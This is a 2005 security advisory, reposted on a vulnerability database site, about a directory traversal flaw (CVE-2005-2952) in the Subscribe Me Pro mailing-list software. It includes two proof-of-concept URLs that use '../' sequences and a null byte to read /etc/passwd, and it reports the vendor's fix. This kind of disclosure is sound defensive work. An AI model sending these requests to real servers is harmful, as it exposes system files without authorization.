Bug: Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability (WLB-2005090004 Ascii Version)

English Version
WLB2

CVE WLB2

WLB2
Full List
Bugs
Bogus
Tricks
Exploits
CVE MAP
Full List
Vendors
Products
Tools
CWE Dictionary
Google Hacking
Search
General
CVE
CWE
RSS
Full List
Bugs
Exploits
Dorks
Information
Our services
Add note
About
Submit

To add a note,

use this form

or send email to

submit@cxsecurity.com

When contacting via email, we recommend coded messages.

Get our PGP public key

 Topic: Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability
 Credit: h4cky0u gmail com
 Date: 2005.09.13
 CWE: N/A
 CVE: CVE-2005-2952 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

--------------------------------------------------------------
HYA-2005-006 h4cky0u.org Advisory 007
--------------------------------------------------------------
Date - Tue Sep 13 2005

TITLE:
======

Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability

SEVERITY:
=========

High

SOFTWARE:
=========

Subscribe Me Pro 2.044.09P and prior

Support Website : http://siteinteractive.com/subpro/

INFO:
=====

Subscribe Me Professional is designed to assist with the building, maintaining, mailing, and tracking of your
customer/prospect mailing lists.

BUG DESCRIPTION:
================

Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal vulnerability. This issue is due to a failure in
the application to properly sanitize user-supplied input. An unauthorized user can retrieve arbitrary files by supplying
directory traversal strings '../' to the vulnerable parameter.

POC:
====

Here are some examples:

www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../.
./etc/passwd%00&SUBMIT=%20%20Submit%20%20

www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscrib
e=subscribe&l=../../../../../../../../etc/passwd%00

VENDOR STATUS:
==============

Vendor Contact : 13th Sep 2005
Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the Latest Release : 2.050.01P

FIX:
====

Upgrade to version 2.050.01P

CREDITS:
========

This vulnerability was discovered and researched by -

ShoCK FX of h4cky0u Security Forums.

mail : shockfx at gmail.com

web : http://www.h4cky0u.org

Co Researcher -

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

ORIGINAL ADVISORY:
=================

http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt

--
http://www.h4cky0u.org
(In)Security at its best...

[ ASCII VERSION ]
Copyright 2012, cxsecurity.com